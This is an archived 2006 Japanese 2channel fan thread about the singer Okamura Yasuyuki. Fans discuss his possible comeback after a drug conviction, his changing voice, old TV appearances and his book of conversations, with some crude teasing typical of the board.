5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

▲▽岡村靖幸10▽▲

1 :伝説の名無しさん:2006/07/05(水) 22:30:20
初代スレ
ttp://makimo.to/2ch/music_legend/1010/1010412765.html
Part2
ttp://makimo.to/2ch/music3_legend/1026/1026168862.html
Part3 〜4 行方不明
Part5
ttp://makimo.to/2ch/music4_legend/1094/1094665809.html
Part6
ttp://makimo.to/2ch/music4_legend/1123/1123601633.html
Part7
ttp://music4.2ch.net/test/read.cgi/legend/1130060658.html
Part8
ttp://music4.2ch.net/test/read.cgi/legend/1143296331/
Part9
ttp://music4.2ch.net/test/read.cgi/legend/1148721068/

岡村靖幸提供曲・参加リスト
ttp://www.moon-light.ne.jp/profile/yasuyuki3.htm
岡村靖幸解説コメント
ttp://www.hat.hi-ho.ne.jp/aim-net/okamura_index.htm
事件簿
ttp://straydog.way-nifty.com/yamaokashunsuke/2005/09/post_a294.html
ttp://bc.kasumikko.com/?eid=207048
その他
ttp://www1.linkclub.or.jp/~goshi54/yasueikyo.htm

お約束(2ch総合案内より抜粋)
荒らし行為に遭遇した場合は、諌めたり挑発したりなど、むやみに対抗しないようにお願いします。特に荒らしを煽るのは逆効果です。
荒らしに反応したらあなたも荒らしかも。。。

※気に入らないと思う人の書き込みは華麗にスルーしましょう。それがスマートな大人の対応です。

2 :伝説の名無しさん:2006/07/05(水) 22:30:58
以下ヨロ

3 :伝説の名無しさん:2006/07/05(水) 23:05:32
>>1
乙!
さて、前スレに引き続いて岡村ちゃんがスムーズに復帰出来る方法について考えようか

4 :伝説の名無しさん:2006/07/05(水) 23:12:48
>>1
乙です。

5 :伝説の名無しさん:2006/07/05(水) 23:14:34
いろいろな状況から考えて、出所後の所属も吉本のような気がする。

楽曲提供やプロデュース等の裏方仕事から入るのがやはり無難だが、
根強いファンの存在や世間一般に対しての低認知度wを考えると、いき
なり本人名義の新曲発表もあり得るかな。

とまあ、全くもって普通の予想w

6 :5:2006/07/05(水) 23:17:40
ごめんごめん。
>>1さんお疲れ。

7 :伝説の名無しさん:2006/07/05(水) 23:19:29
確かに岡村ちゃんが曲提供しても、一般リスナーにとっては「誰?」って感じだろうからなぁ…

8 :伝説の名無しさん:2006/07/05(水) 23:31:44
そんなもんだろう。

時期的にメジャーになる前かどうかは分からないが、山崎まさよしやスガシカオも
「誰?」という感じだったろうからね。

加えて、宣伝の効果も大きい。
大ヒット曲なら「〜の作曲家」って紹介だけで喰いつきが違うだろうし。
宣伝がなければ、作曲家から遡って聴くなんてことはライトな音楽ファンはしないと
思うしな。

9 :伝説の名無しさん:2006/07/05(水) 23:44:49
でも未だに音楽番組で「夜空ノムコウの作詞をした人」としか紹介されないスガシカオも不憫だと…
やっぱ岡村ちゃんにはオリジナルアルバムかコラボでどうにかしてほしいなぁ
岡村ちゃんを拾ってくれる事務所があるかどうかだが

10 :伝説の名無しさん:2006/07/06(木) 00:13:09
認知してもらってから、いかに自身の実力を伝えられるかどうかは、>>9の云う通り別問題だな。
俺も、オリジナルか対等レベルで組み合えるミュージシャンとのコラボを希望。

インディーという選択肢もアリだけど、音楽以外の事務を強力に管理できる側近が必要だな。

11 :伝説の名無しさん:2006/07/06(木) 02:06:35
じゃ私が事務を

12 :伝説の名無しさん:2006/07/06(木) 03:01:55
本人がいかにコンスタントに活動できるかが鍵だと思うけど
シングル、LP出すたびに何年ぶりの新作とか言われてるようじゃ復帰後も期待できないなぁ
才能はものすごいんだから頑張ってほしい。
86曲未発表あるんだからいきなり3枚組みみたいなびっくりさせるLPだして欲しいな

13 :伝説の名無しさん:2006/07/06(木) 03:41:04
ナイトでドサマワリ

14 :伝説の名無しさん:2006/07/06(木) 06:38:45
>>12
ふきんしんかもしれないけど
スタジオに入って初めて曲を作りはじめると語っていた人が
86曲もストックがあるとは思えないがな(´・ω・`)
「オレなんてシャバに出れば86曲くらい軽く作れちゃうんだぜベイベー!!」なら期待したいけど。

裁判時みたいに「覚せい剤が切れない内に撲滅ソングを作るぜベイベー」なら
もう大人しくしててほしい。
傍聴記の内容からして3度目がありそうな気がして不安になる。

15 :伝説の名無しさん:2006/07/06(木) 09:47:02
>>13
それだけは勘弁w

>>14
曲だけはストックあるんじゃないか? やはり問題は歌詞だな。

薬の件は、逮捕前にどの程度の依存度だったのかということと、
薬断ちに対しての意思の強さ次第としか言いようがない。

16 :伝説の名無しさん:2006/07/06(木) 17:46:50
86曲あるかはわかんないけど、ストックがあるのは確かだよ
1,2年前に友達に聴かせてもらったから
うpは持ってないから出来ないけど
ちなみに、5曲ぐらい聴かせてもらったよ

17 : ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄:2006/07/06(木) 18:37:23
    ビシッ / ̄ ̄ ̄ ̄\
    / ̄\(  人____)
  , ┤    ト|ミ/  ー◎-◎-)
 |  \_/  ヽ    (_ _) )
 |   __( ̄ |∴ノ  3 ノ
 |    __)_ノ ヽ     ノ
 ヽ___) ノ    ))   ヽ.


18 :伝説の名無しさん :2006/07/06(木) 18:48:59
靖幸ちゃんはアルバムをずっとLPとよぶ
あたりにレコード世代のこだわりを感じる

19 :伝説の名無しさん:2006/07/06(木) 19:28:10
1さん乙です。

岡村ちゃん思い切って復帰第一弾(って何度目?)はセルフカバーはどう?
美里やメグやソフィアにあげた曲!
あたしは結構西田に提供した曲すきだな。


20 :伝説の名無しさん:2006/07/06(木) 21:53:25
歌唱力劣化で歌えなかったりして...

21 :伝説の名無しさん:2006/07/06(木) 22:00:30
>>19
その発想は無かったわ
でもまぁ、まずはボイトレして欲しいなぁ…原曲歌ってる歌手より下手だったら悲しいし
てか、本当にボイトレしないと今の歌唱力じゃヤバいんじゃないかと

22 :伝説の名無しさん:2006/07/06(木) 22:10:22
声が昔に戻れば見た目なんていくらでもカバーできるよ
(と俺は思う)
そしたら「あの娘」とか「ステップうp」とか「どぉな…」とか
おもいきってカテキョ丸ごと新録しておくれよ靖幸

23 :伝説の名無しさん:2006/07/06(木) 22:23:22
過去に、Dog Days〜DATEの間ぐらいで声質が変わっているんだよなぁ。
特に高音の伸びと、声の艶が違う。

引篭もり期の度重なる喉のトラブルによって、大分やられてしまったのだろうか?
本人の不摂生が、歌唱力の低下の原因として一番大きいとは思うけど。



24 :伝説の名無しさん:2006/07/06(木) 22:26:52
岡村ちゃん初心者です。
へんなこと聞いて申し訳ないんですが今彼は刑務所に入ってるんですか?


25 :伝説の名無しさん:2006/07/06(木) 22:34:49
>>24
>>1

26 :伝説の名無しさん:2006/07/06(木) 22:41:19
>>23
声質っつうか歌い方が変わったんじゃないかなぁ
例えば禁生の『どぉしたらいいんだろう』の「どぉ〜したらいいんだぁろぉ〜〜」の「ろぉ〜〜」の部分だけ家庭教師以前の声なのに
それ以外の部分は力むような歌い方で声質が変わったように聴こえるという


俺が言いたいこと伝わったかな

27 :伝説の名無しさん:2006/07/06(木) 22:51:44
>>26

声質というほど大袈裟なものではないかもしれないけど、Dog Days と Out Of Blue
のオリジナルverと早熟verを比較するとかなり違って聴こえるんだよなぁ。
歌唱力up&マイク他録音機材の違いというのもあるかもしれない。

禁生収録の作品群は、実際のところ何年頃に録音されたのか分からないので何とも
言えない。

28 :伝説の名無しさん:2006/07/06(木) 22:57:46
あ、早熟って録り直してるのか
ベストだったら聴かなくてもいいやって思ってノータッチだったわ
『どぉしたらいいんだろう』は歌い方からして割と最近(95年当時)にレコーディングされたものだと思う
上で言ったようにサビで一瞬だけ昔の声が聞こえてなんか泣きそうになった

29 :伝説の名無しさん:2006/07/06(木) 23:12:23
禁生収録の作品のいくつかは、相当早い時期にできていたと推定(断定)されるものがあるよな。

あばれ太鼓のリフは90年、Peach X'masは89年のNHK(だったか?)、妻になってよは92年の
ツアーで演奏、パラシュート・ガールは92年、どおしたらいいんだろうのバックトラックの基本
部分は(E)naのPVで登場。

どうなっちゃってんだよw



30 :伝説の名無しさん:2006/07/06(木) 23:13:08
今ようつべに貼ってあるインタブで昔と今の声質比べて見たけど
やっぱ今の籠もったような声はデヴ声ってもんなのかな
痩せれば解消されそうな感じがした
喉がおかしくなってるならもう救いようがないかもしれないけど…
しかし岡村ちゃんはいつ見ても目つきが悪いなw

31 :伝説の名無しさん:2006/07/06(木) 23:27:02
>>30

もともと喋りが得意な人じゃないからな。
目つきが悪いのは、緊張してるのだろうと好意的に解釈w

ブランク明けの96年のツアー時も声の調子は良くなかったが(あの体形で踊りながら
歌うのだから当然だがw)、奇跡的に全盛期レベルの声が出てるときもあった。

以前、Me-imiの初日Zepp Tokyoは声が出ていたという書き込みを多く見かけたけど、
行った人はいるかい?



32 :伝説の名無しさん:2006/07/06(木) 23:31:17
つ〜か、普通に目が悪いんでしょ

ファミコンやパソコン大好きだし

33 :伝説の名無しさん:2006/07/07(金) 00:29:49
ファミコンって言葉、岡村の歌以外で久々に聞いたw

34 :伝説の名無しさん:2006/07/07(金) 00:35:27
ファミコンって単語は今でも使われるよ

女の人かな?

35 :伝説の名無しさん:2006/07/07(金) 00:49:58
>>30
昔のトークももごもご言ってたよ岡村ちゃんは
曲歌うとあんなにいい声なのにな。やっぱ歌手はこうでなくっちゃ

36 :33:2006/07/07(金) 00:52:59
そうなのか、すまん
いや、男だけど俺の周りで誰もファミコンなんて言ってないからさw
ゲーム関係に興味ないからな〜

37 :伝説の名無しさん:2006/07/07(金) 01:23:30
>>36
男でゲームに興味ないのも珍しいな

おっさん、おばさんゲーマーも多いのに

38 :伝説の名無しさん:2006/07/07(金) 04:33:38
いま初めていいともとジャストポップアップ見た。
やっぱりというか何というか、変な人だなぁw
このキャラで激太りは確かに辛いかも…本人にとって。
刑務所でいっぱいいろんな妄想してるんだろうか。
いつか語れる時がきたら、ムショ生活のことも語ってほしいな。

39 :伝説の名無しさん:2006/07/07(金) 04:38:18
俺も今いいともケータイでセコセコ見てるとこだが、
岡村ちゃんって口調が幼いなぁ…っていうか内向的でモテなかったってのは意外だ
やっぱ「岡村ちゃん」っていうキャラを作ってたんだな

40 :伝説の名無しさん:2006/07/07(金) 04:43:44
てかお友達紹介がバービーボーイズの杏子さんって…SUGEEEEEEEEEEEEE!!!!!!

41 :伝説の名無しさん:2006/07/07(金) 07:43:08
しかしなぁ、刑務所に入っていて出たらすぐに音楽活動に入れるもんだろうか。
単に音楽を絶っていただけなら、渇望心で作曲にのめり込むといきそうだが。

刑務所に入ったことはないから想像の域をでないけど、
本人は相当な挫折なんじゃないか?
少なくとも俺なら音楽活動をするようなアクティプな状態になるのに、かなり時間がかかると思う。
禁生のころもこれから活動しますみたいなこといって停滞期にはいったし。
精神面でなかなか難しそうだな。

42 :伝説の名無しさん :2006/07/07(金) 11:39:26
>>31
Me-imiツアー初日のZepp Tokyoに行ったんだけど前年のフレッシュボーイ
に比べたら、すごく声が出てたように感じた。あと踊りのキレも。

舞台のカーテンが閉まった状態で1曲目の5!!モンキーを歌い
カーテンが開き岡村ちゃんが登場した瞬間を今も忘れられない。

43 :伝説の名無しさん:2006/07/07(金) 12:25:20
>1事件簿の
渋谷署に職質された4月から逮捕の5月までの間、恋人(有名芸能人)と一緒に、
何とか事件化を阻止できないかと、
警察(渋谷署)に顔が効く関係者の間を渡り歩いていました。


恋人って誰?

44 :伝説の名無しさん:2006/07/07(金) 13:03:31
>>43

あくまで噂でしかないので真相は不明だよ。

この類の憶測ネタは荒れる原因にもなるからね。
噂話板の方で聞いてみたら?

45 :伝説の名無しさん:2006/07/07(金) 13:32:41
冷静に考えたら今年2006年はデビュー20周年?!

そんな大事な年なのに、逮捕ネタばっかりの今を考えると鬱だ。

20周年ボックスCDとか、吉川晃司、美里が駆けつけるライブとかさ幻に
なっちゃったよ

46 :伝説の名無しさん:2006/07/07(金) 16:02:04
こればかりは自業自得だから仕方ない

47 :伝説の名無しさん:2006/07/07(金) 19:41:15
でもさ、いずれ復活したとして
今現在ってどの位のファンが残ってるんだろうね?
オク見てても、逮捕前よりだいぶ落札額も落ちたみたいだし
昔は武道館を満員に出来た人なのに、
せっかく復活しても会場ガラガラだったらやだな…

48 :伝説の名無しさん:2006/07/07(金) 21:27:22
豪華ホテルでディナーショー

49 :伝説の名無しさん:2006/07/07(金) 23:08:56
俺は岡村ちゃんにはライブ活動してもらうよりも、CDをチャンチャンと滞りなくリリースしてもらう方がいいな
ダンスのステージだって、もう岡村ちゃんも歳なんだしあんま無理して欲しくないっていうのもある

50 :伝説の名無しさん:2006/07/08(土) 00:31:22
関係ないけど同世代繋がりで吉川とフミヤ
尾崎ワラタ

http://www.youtube.com/watch?v=uU2SVLfWGug

51 :伝説の名無しさん:2006/07/08(土) 22:55:16
>>49
CDは定期的に出してくれれば言う事ないけど、ライブもして欲しいな。
昔みたいにガンガン踊って欲しいとは思わないし
無理して踊っても痛々しい感じがするから程々で…w。
以前にやったアコースティックライブみたいなのでいいな。


52 :伝説の名無しさん:2006/07/08(土) 22:58:27
いしだ壱世や元ドリカムのアレとかとバンド組んで再デビューしてくれ

53 :伝説の名無しさん:2006/07/08(土) 23:10:53
>>52
だったらバンド名は何にする?
やっぱクスリがらみ?

54 :伝説の名無しさん:2006/07/08(土) 23:17:55
>>40

55 :伝説の名無しさん:2006/07/08(土) 23:20:20
>>53
臭い飯

56 :伝説の名無しさん:2006/07/08(土) 23:37:19
>>53
ドラック・ドラゴン

57 :伝説の名無しさん:2006/07/08(土) 23:40:15
>>56
いし川靖幸

58 :伝説の名無しさん:2006/07/09(日) 00:57:45
>>53
イワン&ヤスユキ

59 :伝説の名無しさん:2006/07/09(日) 00:59:16
そうかイワンも新たな仲間に加わったんだな

60 :伝説の名無しさん:2006/07/09(日) 01:00:22
あの子僕が覚醒剤キメたらどんな顔するだろう は名曲ですね

61 :伝説の名無しさん:2006/07/09(日) 02:06:41
>>53


62 :伝説の名無しさん:2006/07/09(日) 06:10:18
>>53
オン ザ エッヂ

63 :伝説の名無しさん:2006/07/09(日) 08:10:54
>>59
それは知らなんだ

でも復帰後薬撲滅云々の活動ばっかだったら嫌だ
普通の音楽活動してほしい

64 :伝説の名無しさん:2006/07/09(日) 22:59:48
ひさしぶりに来てみたら静かだな、誰もいないのかorz

65 :伝説の名無しさん:2006/07/10(月) 00:34:10
>>61
嵐も逮捕されたよなw

66 :伝説の名無しさん:2006/07/10(月) 00:38:17
YouTubeにある、いいともに出た時の岡村ちゃんは凄いな

バービーボーイズの杏子の戸惑う声が・・・

67 :61:2006/07/10(月) 01:48:05
>>65

分かってくれる人がいたかw
ジャニの話題なんかする気はないぜ !

68 :伝説の名無しさん:2006/07/10(月) 01:51:53
どんな話しをしようと
その人の勝手よ
くだらない

69 :伝説の名無しさん:2006/07/10(月) 02:01:17
>>53
あの娘ぼくが薬決めたらどんな顔す

70 :伝説の名無しさん:2006/07/10(月) 07:08:31
イワンも嵐も薬でタイーホ?
岡村ちゃんと新ユニット結成

71 :伝説の名無しさん:2006/07/10(月) 07:11:10
>>66
つうか昔のテレフォンショッキングってアポなしだったんかな
あれは一種の放送事故なんかしら…それにしてもあの岡村ちゃん見てて痛々しくて泣けてくるw

72 :伝説の名無しさん:2006/07/10(月) 12:51:29
>>71
今なら親しくなくても電話がいく段取りになってるからね

73 :伝説の名無しさん:2006/07/10(月) 13:03:12
そういえばタモリさんに代わりまーすって無かったな

74 :伝説の名無しさん:2006/07/10(月) 13:09:24
あの数年後に尾崎が死に、岡村ちゃんも引きこもっちゃうんだよな・・・

75 :伝説の名無しさん :2006/07/10(月) 18:47:02
いわばシャイでひきこもりの日常を返上したい

76 :伝説の名無しさん:2006/07/10(月) 18:59:36
岡村「以前から好意を抱いてて」
杏子「・・・?・・・もしもし!?」

チャカ「キャンディーはないのね」
岡村「・・・?・・・もしもし!?」

2回とも意思の疎通がとれていない

77 :伝説の名無しさん:2006/07/10(月) 19:14:57
岡村ちゃんって二回いいとも出てんの?すげぇな

てか何で杏子さんはあんなにトゲトゲしてたんだ?
アナウンサーが「いいともだ」って取次したんじゃねぇの

78 :伝説の名無しさん:2006/07/10(月) 19:27:39
岡村ちゃんの電話の仕方に問題ありだろw

79 :伝説の名無しさん:2006/07/10(月) 19:40:17
>>77
うん2回出てる。松岡→岡村→杏子 と 吉川→岡村→チャカ

小室哲也の羽振りの良さから始まり
「シーツを変えてる自分の姿がかっこ悪いんんだけど健気で愛おしい」
「僕んち洗濯機ありますよ。大好き、そういうことやってる自分」
「とろろ蕎麦を食べると大人の気分になる」
とか話してた。

サプライズ狙って杏子側のスタッフが電話受け取って
黙って杏子に受話器を渡したとか。みんなで話しても憶測の域だけど。

80 :伝説の名無しさん:2006/07/10(月) 19:51:13
>>79
サプライズというよりは放送事故じゃないかあれはwwww
見ててヒヤヒヤしちまったよ
岡村ちゃんあの後かなり落ち込んだんじゃなかろうか

81 :伝説の名無しさん:2006/07/10(月) 20:01:29
二回目のもYouTubeに上がんないかなw

82 :伝説の名無しさん:2006/07/10(月) 21:53:52
そういえば岡村ちゃんマルチプレイヤーだけど、
ドラムも自分でやってんのか?打ち込み?

83 :伝説の名無しさん:2006/07/10(月) 22:08:11
ようつべで初めてHARD WORKER聴いたけど、
あまりの岡村ちゃんテイスト濃厚さにビビタ。
これ詞は岡村ちゃんじゃないんだよね?
意識しまくって書いたってことか?

84 :伝説の名無しさん:2006/07/10(月) 22:57:58
なんだかこういうかんじになりそーな気が。
http://news18.2ch.net/test/read.cgi/mnewsplus/1152261163/201-300

85 :伝説の名無しさん:2006/07/10(月) 23:00:55
>>84
それは充分有り得る…

86 :伝説の名無しさん:2006/07/10(月) 23:44:33
とろろ蕎麦ブームがずっと続いてたら
あれほど巨大化しなかったかもね
青山の黒麦によく行ってたらすぃ

87 :伝説の名無しさん:2006/07/11(火) 06:53:14
とろろ蕎麦で大人を感じるくらいだから
おこちゃま味なものが好きなんだろうな、昔も今も。クッキー持ち歩くくらいだし。

88 :伝説の名無しさん:2006/07/11(火) 06:59:52
ジャンクフードデブだからな

89 :伝説の名無しさん:2006/07/11(火) 08:43:43
>>84-85
拘置所と刑務所は別物なんだけど。

90 :伝説の名無しさん:2006/07/11(火) 09:00:57
ホリエモンみたく短期間でやせるとリバウンドするって言うけど
岡村ちゃんは1年以上も入ってる訳だし、
もしやせてたら出所してもリバウンドはしないと信じたい…

91 :伝説の名無しさん:2006/07/11(火) 09:24:05
痩せるとかよりも
心身ともに薬が抜けるかの方が心配

92 :伝説の名無しさん:2006/07/11(火) 09:34:20
もし出所後薬やったらそのときは今度こそ音楽界から抹殺されるだろうし、
何より身体的にも精神的にももう終わりなんだろうな…
薬の依存は本当に厄介だから、出所後もやっちゃう可能性は無いとも言えないし
施設に入った方が岡村ちゃんの為にはいいのかも

93 :伝説の名無しさん:2006/07/11(火) 09:42:56
そうだね、音楽より何よりまずは心身の健康だからね
はぁ〜心配だ。。

94 :伝説の名無しさん:2006/07/11(火) 12:05:01
youtube見たら、岡村ちゃんいっぱいだった。

95 :伝説の名無しさん:2006/07/11(火) 13:30:29
なんか人間失格で依存する対象が酒かクスリかみたいな話を思いだしたな。

岡村の場合、従来、菓子依存だったのに、太ったら、周囲の評価がひどかったので、
やせるために努力した。で、菓子に依存するわけにいかなくなったので、
対象をクスリに変えたってことかな。

そう考えると、菓子もクスリも駄目なら、出所後、他に依存対象みつけないと
厳しいかも。

96 :伝説の名無しさん:2006/07/11(火) 13:35:52
精神的に病んでる人間は何かに依存するらしい

97 :伝説の名無しさん:2006/07/11(火) 13:46:51
>>95
自分も岡村ちゃんの落ち具合を見てて人間失格を思い出したりしてたよ
妙に岡村ちゃんと主人公の境遇が重なって…最後主人公は廃人になっちゃうんだよな…
刑務所入っただけで薬って完全に抜けるもんなのか?
お節介ながら出所したらしばらく施設で治療受けた方がいいんじゃないかと
またやっちゃう可能性もあるし
音楽活動はその次でいいから

98 :伝説の名無しさん:2006/07/11(火) 13:55:34
取り敢えず、昔の輝きを取り戻してほしいな

99 :伝説の名無しさん:2006/07/11(火) 14:04:50
悲観的な書き込みが多いな…

100 :伝説の名無しさん:2006/07/11(火) 14:10:43
こういう状況じゃ悲観的になるのは無理もない
昔ってったってもう40なんだし、活動内容は今出来る範囲でいいよ
ついでに100ゲト

101 :伝説の名無しさん:2006/07/11(火) 14:14:49
もうすぐ41です

102 :伝説の名無しさん:2006/07/11(火) 14:21:21
40代で20代の頃と同じようにバリバリ踊るってのはどうやったって無理だろうと思ったり

弾き語り評判いいならそっちメインでやって欲しいな

103 :伝説の名無しさん:2006/07/11(火) 14:26:40
20代の頃の様に踊るのは無理だろうけど、
恰幅のいい体で一生懸命踊る岡村ちゃんも健気でなかなか良い

104 :伝説の名無しさん:2006/07/11(火) 14:36:36
News 23のはあの体型で必死に踊ってるな

105 :伝説の名無しさん:2006/07/11(火) 16:33:59
フレッシュボーイツアーで踊る岡村ちゃん格好良いよね。楽しそう。

106 :伝説の名無しさん:2006/07/11(火) 16:53:39
>>94
(E)na RSR vegetable etcがガッツリ消えてる

107 :伝説の名無しさん:2006/07/11(火) 17:03:44
プロモの類は買えば見れるからいいけど、ライブ映像とかテレビ出演の映像消えるのは痛いな
っつうか何で消去されちゃったんかね

108 :伝説の名無しさん:2006/07/11(火) 17:07:09
だな
プロモはDVDの方が画質いいとしても未発売のLiveのは困るな

109 :伝説の名無しさん:2006/07/11(火) 17:12:17
あれ?ようつべに以前、超・超激太り(News23の時の比じゃない)の岡村ちゃんが
ぜぇぜぇ、はぁはぁ言いながら「聖書」を歌い踊ってる動画あったのに・・・消えた、、、


110 :伝説の名無しさん:2006/07/11(火) 17:13:04
コンサートの奴?

111 :伝説の名無しさん:2006/07/11(火) 17:13:28
そういえば最近ようつべにうpされてたイケナイコトカイのライブ映像って未発表?

112 :伝説の名無しさん:2006/07/11(火) 17:14:29
>>109
RSR?

113 :伝説の名無しさん:2006/07/11(火) 17:24:19
>>110
そう
>>109
わからんけど
そうか、がっつり消えたのか・・・残念。めちゃめちゃ面白かったのに。。。




114 :伝説の名無しさん:2006/07/11(火) 17:27:29
>>113
野外ライブのやつじゃなくて別のやつ?
news23以外で聖書歌ってた動画ってそれしか見た覚えないんだけど

115 :伝説の名無しさん:2006/07/11(火) 17:28:52
コンサートと言うか、貴方が言うように野外ライブの奴だな

116 :伝説の名無しさん:2006/07/11(火) 17:30:30
北海道の?

117 :伝説の名無しさん:2006/07/11(火) 17:32:04
野外でよかったか。それなら見たよ
そんな激太りしてたか?必死で苦しそうに歌ってたのは覚えてるがww

118 :伝説の名無しさん:2006/07/11(火) 17:35:11
体格的には23のとあんま変わらんかったような

が、確かに辛そうに歌ってた記憶がある

119 :伝説の名無しさん:2006/07/11(火) 23:35:53
2003年のZEPP TKOの時な

120 :伝説の名無しさん:2006/07/11(火) 23:58:06
TKOてwww

121 :伝説の名無しさん:2006/07/12(水) 00:33:32
TKO?

122 :伝説の名無しさん:2006/07/12(水) 01:56:37
>>119
で、2003年のZEPP TKOの時が何なの?

123 :伝説の名無しさん:2006/07/12(水) 02:01:48
おったなそんなお笑い>TKO


124 :伝説の名無しさん:2006/07/12(水) 02:11:13
てか、家庭教師のライブビデオのビキニパンツ姿晒しって元ネタプリンスなん?

某スレでプリンスがビキニパンツがどーのこーのって見かけたから

125 :伝説の名無しさん:2006/07/12(水) 05:13:10
プリンスがパクッタらしいよ


126 :伝説の名無しさん:2006/07/12(水) 05:49:50
不思議なこともあるもんですね

127 :伝説の名無しさん:2006/07/12(水) 10:02:32
岡村チャンのようつべ、タモとのトーク、誰か貼って。見たい。

128 :伝説の名無しさん:2006/07/12(水) 12:27:35
このくそブタが幻覚で自ら灯油をかぶる日も近いだろう

129 :伝説の名無しさん:2006/07/12(水) 16:54:54
あと30万 ただ30万欲しい〜い

130 :伝説の名無しさん:2006/07/12(水) 17:17:47
岡村ちゃんって1度も結婚してないんだよね?

結婚とか家庭に憧れて、若くして結婚しちゃいそうなタイプっぽそうなのに。
なんか不思議。

131 :伝説の名無しさん:2006/07/12(水) 17:44:58
歌詞で自分自身のことを書いてるんなら、結婚願望はかなり強いってことだよな
結婚したいんだとか臆することなく書いちゃってるし
でも40にもなって結婚出来ないっていうのは岡村ちゃん自身に何か問題があるのか、結婚に対して高望みし過ぎなのか

132 :伝説の名無しさん:2006/07/12(水) 18:28:29
結婚しないのは
精神的に、まだまだ子供なんだよ

133 :伝説の名無しさん:2006/07/12(水) 21:02:57
結婚してるから大人でもないし、子供いるから親じゃないんだよ

まだ若いね
考え方が

134 :伝説の名無しさん:2006/07/12(水) 21:05:55
簡単に親にならないのは赤ん坊より愛しいのは自分だから?

まさに岡村ちゃん自身のことを言ってるんかもな

135 :伝説の名無しさん:2006/07/12(水) 21:08:28
今の避妊もせずにSEXに狂う若者達に聞かせたい言葉だなw

136 :伝説の名無しさん:2006/07/13(木) 00:36:05
まあ、出会いじゃないの?結婚はひとりじゃできないし。

137 :伝説の名無しさん:2006/07/13(木) 00:39:33
何となくだが、DT松本と同じように「好きな人が年老いて行くのを見たくない」とか思ってそう

138 :伝説の名無しさん:2006/07/13(木) 04:13:40
「好きな人が年老いて行くのを見たくない」とか思ってそう


女性を性の道具としか見てないな・・・


139 :伝説の名無しさん:2006/07/13(木) 04:23:50
そうかなぁ。勝手なイメージでは
君がお婆ちゃんになっても一緒に手をつないで歩きたいぜ、ベイベー!な人な気もするけど
やっぱ永遠の19歳なんだろうかw

純愛カウンセリングではそういうことは語られてないの?
詞は好きだけど
岡村ちゃん聞き上手じゃなさそうだし、話も上手でもなさそうだから
対談つーのがイマイチ買う気しないんだけど。ファンなら買うべき?

140 :伝説の名無しさん:2006/07/13(木) 11:55:08
岡村ちゃんの音楽が好きなだけで、
岡村ちゃんの考えとかにあんまり興味ないんなら買わなくてもいいと思う。

音楽だけじゃなくて、岡村ちゃん自身に興味があるなら買ってみたらいいと思うよ。

141 :伝説の名無しさん:2006/07/13(木) 11:57:25
サイン本って、何冊ぐらい出回ったんだろうね

142 :伝説の名無しさん:2006/07/13(木) 12:15:10
>>140
参考にならないな。

考えに興味があるないじゃないとじゃなくて
本の内容(岡村ちゃんの考え)がどれだけ詰まったものなのかを知りたかったんだけど。
まぁいいやamazonのレビューでも見てこよ。

143 :伝説の名無しさん:2006/07/13(木) 12:54:18
まあ、>>139の文章からでは、>>140の答えでもいたしかたあるまい。

144 :伝説の名無しさん:2006/07/13(木) 12:56:15
欲しがってばかりのbaby

145 :伝説の名無しさん:2006/07/13(木) 12:59:30
>>142
質問しといてそれはちょっと失礼じゃないか?だったら最初からアマゾン嫁と
って言っても都合悪いことは自演扱いされるだろうが


でもこの本ってファンの間じゃあんま評判良くないわな
読んだことないから分からんが

146 :伝説の名無しさん:2006/07/13(木) 13:07:58
田原総一郎との対談はまあまあ

他はときめもを語ったりしてる

147 :伝説の名無しさん:2006/07/13(木) 14:25:29
質問のマナーがおかしい奴を最近よく目にする。

レスが返ってこなかったり、あるいは面倒くさがらず検索かけりゃ気持ち
よく分かる事をあえて2chで聞くという手段を選んでおきながら、一寸厳し
いレスをつけられたりするとと逆ギレするんだよな。

2ch全体で見られる傾向なのかは分からんが。
それとも、新手の釣りなのかい?



148 :伝説の名無しさん:2006/07/13(木) 14:43:06
答えて貰うのが当たり前みたいな考え方やろ

149 :伝説の名無しさん:2006/07/13(木) 16:13:50
質問するのは多分ググっても出て来なかったからだと思うんだけど、
答えてもらったときの態度が悪い(お礼言わないとか)。
でもこういう傾向はこのスレだけのことじゃないから、岡村ちゃんに関すること以外の議論は控えようぜ

150 :伝説の名無しさん:2006/07/13(木) 16:38:46
そうだね。イケナイコトカイ。
さかさまから呼んでもイケナイコトカイ

151 :伝説の名無しさん:2006/07/13(木) 16:41:01
イカトコイナケイ

152 :伝説の名無しさん:2006/07/13(木) 18:10:17
今のnetwork全体の問題だからあまり青筋立てんなよ

153 :伝説の名無しさん:2006/07/13(木) 18:13:18
話蒸し返すなっつうの糞が

154 :伝説の名無しさん:2006/07/13(木) 18:37:01
純愛カウンセリング まあまあだよ。
ものすごい個性的な人と対談してて
それ選んだ岡村って面白い人なんだなあと思った。

155 :伝説の名無しさん:2006/07/13(木) 18:40:13
岡村ちゃんが自らオファーしたのか
確かバー(ゲイ?)のママとかも対談相手だったよな
人選がすげぇw

156 :伝説の名無しさん:2006/07/13(木) 18:43:21
岡村ちゃんが興味示した人選んだんじゃなかったっけ?
でもファンとしては一般人とかと話して欲しかったw
岡村ちゃん知らない人に曲聞かせて反応見つつ会話とかさ


157 :伝説の名無しさん:2006/07/13(木) 19:10:07
>>153
それを煽る君もw

158 :伝説の名無しさん:2006/07/13(木) 22:11:08
でも純愛カウンセリングは表紙があれだから店頭では非常に買いにくいw
CDのジャケットみたいに恥ずかしくしなくてもよかったのに

159 :伝説の名無しさん:2006/07/13(木) 22:50:25
あの位で買いにくいんなら、岡村のどのCDも買えないじゃないか。
あれとはなんだ、あれとは。

160 :伝説の名無しさん:2006/07/13(木) 23:16:54
>>158
そんな表紙恥ずかしいかなぁ?
それよりも【純愛カウンセリング】って言うタイトルが少し恥ずかしい。
最初なかなか見つからなかったんだけど、
タイトル言うの嫌だから、店員に聞かずに必死に探しちゃったよw

161 :伝説の名無しさん:2006/07/13(木) 23:17:08
>>156
そんなことやって目の前でひかれたら、立ち直れないだろ。
皆が皆聴いて良さがわかるくらいなら、ヒットチャートは総入れ替えになってるよ。

162 :伝説の名無しさん:2006/07/14(金) 20:39:40
ajapaiと一緒にやってる曲っていつ頃収録したのかな?

163 :伝説の名無しさん:2006/07/14(金) 20:40:22
上げちまった。すまん。

164 :伝説の名無しさん:2006/07/15(土) 00:45:52
今日、尾崎トリビュートを350円で売ってたから買ってきたw
太陽の破片悪くはないけど、
